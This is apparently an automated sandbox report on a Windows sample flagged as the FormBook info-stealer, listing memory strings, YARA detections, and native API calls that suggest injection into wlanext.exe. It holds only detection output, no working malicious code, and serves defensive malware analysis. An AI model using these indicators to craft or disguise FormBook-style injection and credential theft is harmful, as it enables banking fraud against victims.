Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/BreadcrumbList
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/ListItem
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/NewsArticle
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: explorer.exe, 0000000C.00000000.669438357.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0v
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004181C0 NtCreateFile, 9_2_004181C0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00418270 NtReadFile, 9_2_00418270
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004182F0 NtClose, 9_2_004182F0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004183A0 NtAllocateVirtualMemory, 9_2_004183A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004181BC NtCreateFile, 9_2_004181BC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041826B NtReadFile, 9_2_0041826B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004182EA NtClose, 9_2_004182EA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_01369910
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013699A0 NtCreateSection,LdrInitializeThunk, 9_2_013699A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_01369860
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369840 NtDelayExecution,LdrInitializeThunk, 9_2_01369840
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_013698F0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A20 NtResumeThread,LdrInitializeThunk, 9_2_01369A20
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_01369A00
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A50 NtCreateFile,LdrInitializeThunk, 9_2_01369A50
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369540 NtReadFile,LdrInitializeThunk, 9_2_01369540
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013695D0 NtClose,LdrInitializeThunk, 9_2_013695D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369710 NtQueryInformationToken,LdrInitializeThunk, 9_2_01369710
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013697A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_013697A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369780 NtMapViewOfSection,LdrInitializeThunk, 9_2_01369780
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369FE0 NtCreateMutant,LdrInitializeThunk, 9_2_01369FE0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_01369660
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_013696E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369950 NtQueueApcThread, 9_2_01369950
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013699D0 NtCreateProcessEx, 9_2_013699D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369820 NtEnumerateKey, 9_2_01369820
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136B040 NtSuspendThread, 9_2_0136B040
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013698A0 NtWriteVirtualMemory, 9_2_013698A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369B00 NtSetValueKey, 9_2_01369B00
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A3B0 NtGetContextThread, 9_2_0136A3B0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A10 NtQuerySection, 9_2_01369A10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A80 NtOpenDirectoryObject, 9_2_01369A80
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136AD30 NtSetContextThread, 9_2_0136AD30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369520 NtWaitForSingleObject, 9_2_01369520
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369560 NtWriteFile, 9_2_01369560
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013695F0 NtQueryInformationFile, 9_2_013695F0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369730 NtQueryVirtualMemory, 9_2_01369730
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A710 NtOpenProcessToken, 9_2_0136A710
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A770 NtOpenThread, 9_2_0136A770
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369770 NtSetInformationFile, 9_2_01369770
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369760 NtOpenProcess, 9_2_01369760
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369610 NtEnumerateValueKey, 9_2_01369610
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369670 NtQueryInformationProcess, 9_2_01369670
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369650 NtQueryValueKey, 9_2_01369650
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013696D0 NtCreateKey, 9_2_013696D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A50 NtCreateFile,LdrInitializeThunk, 17_2_03969A50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039699A0 NtCreateSection,LdrInitializeThunk, 17_2_039699A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_03969910
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969840 NtDelayExecution,LdrInitializeThunk, 17_2_03969840
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_03969860
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969780 NtMapViewOfSection,LdrInitializeThunk, 17_2_03969780
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969FE0 NtCreateMutant,LdrInitializeThunk, 17_2_03969FE0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969710 NtQueryInformationToken,LdrInitializeThunk, 17_2_03969710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039696D0 NtCreateKey,LdrInitializeThunk, 17_2_039696D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_039696E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969650 NtQueryValueKey,LdrInitializeThunk, 17_2_03969650
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_03969660
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039695D0 NtClose,LdrInitializeThunk, 17_2_039695D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969540 NtReadFile,LdrInitializeThunk, 17_2_03969540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A3B0 NtGetContextThread, 17_2_0396A3B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969B00 NtSetValueKey, 17_2_03969B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A80 NtOpenDirectoryObject, 17_2_03969A80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A10 NtQuerySection, 17_2_03969A10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A00 NtProtectVirtualMemory, 17_2_03969A00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A20 NtResumeThread, 17_2_03969A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039699D0 NtCreateProcessEx, 17_2_039699D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969950 NtQueueApcThread, 17_2_03969950
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039698A0 NtWriteVirtualMemory, 17_2_039698A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039698F0 NtReadVirtualMemory, 17_2_039698F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969820 NtEnumerateKey, 17_2_03969820
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396B040 NtSuspendThread, 17_2_0396B040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039697A0 NtUnmapViewOfSection, 17_2_039697A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A710 NtOpenProcessToken, 17_2_0396A710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969730 NtQueryVirtualMemory, 17_2_03969730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A770 NtOpenThread, 17_2_0396A770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969770 NtSetInformationFile, 17_2_03969770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969760 NtOpenProcess, 17_2_03969760
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969610 NtEnumerateValueKey, 17_2_03969610
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969670 NtQueryInformationProcess, 17_2_03969670
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039695F0 NtQueryInformationFile, 17_2_039695F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396AD30 NtSetContextThread, 17_2_0396AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969520 NtWaitForSingleObject, 17_2_03969520
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969560 NtWriteFile, 17_2_03969560
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE82F0 NtClose, 17_2_02EE82F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE8270 NtReadFile, 17_2_02EE8270
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE83A0 NtAllocateVirtualMemory, 17_2_02EE83A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE81C0 NtCreateFile, 17_2_02EE81C0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE82EA NtClose, 17_2_02EE82EA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE826B NtReadFile, 17_2_02EE826B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE81BC NtCreateFile, 17_2_02EE81BC
Detected potential crypto function
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 0_2_015B8E10 0_2_015B8E10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041CAB3 9_2_0041CAB3
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00408C60 9_2_00408C60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041BC8F 9_2_0041BC8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B758 9_2_0041B758
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132F900 9_2_0132F900
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013FE824 9_2_013FE824
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1002 9_2_013E1002
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F20A8 9_2_013F20A8
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B090 9_2_0133B090
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F28EC 9_2_013F28EC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2B28 9_2_013F2B28
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135EBB0 9_2_0135EBB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EDBD2 9_2_013EDBD2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F22AE 9_2_013F22AE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01320D20 9_2_01320D20
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2D07 9_2_013F2D07
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1D55 9_2_013F1D55
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F25DD 9_2_013F25DD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133841F 9_2_0133841F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013ED466 9_2_013ED466
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1FF1 9_2_013F1FF1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013FDFCE 9_2_013FDFCE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01346E30 9_2_01346E30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013ED616 9_2_013ED616
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2EF7 9_2_013F2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395EBB0 17_2_0395EBB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EDBD2 17_2_039EDBD2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2B28 17_2_039F2B28
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F22AE 17_2_039F22AE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392F900 17_2_0392F900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B090 17_2_0393B090
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F20A8 17_2_039F20A8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F28EC 17_2_039F28EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E1002 17_2_039E1002
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1FF1 17_2_039F1FF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2EF7 17_2_039F2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03946E30 17_2_03946E30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F25DD 17_2_039F25DD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393D5E0 17_2_0393D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2D07 17_2_039F2D07
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03920D20 17_2_03920D20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1D55 17_2_039F1D55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393841F 17_2_0393841F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039ED466 17_2_039ED466
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EECAB3 17_2_02EECAB3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED2FB0 17_2_02ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB758 17_2_02EEB758
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEBC8F 17_2_02EEBC8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED8C60 17_2_02ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED2D90 17_2_02ED2D90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0392B150 appears 35 times
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: String function: 0132B150 appears 35 times
One or more processes crash
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
Sample file is different than original file name gathered from version info
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.719959307.00000000052A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmp Binary or memory string: originalfilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725096915.0000000006460000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.708791475.0000000000ACE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.724929316.0000000006210000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs PO45937008ADENGY.exe
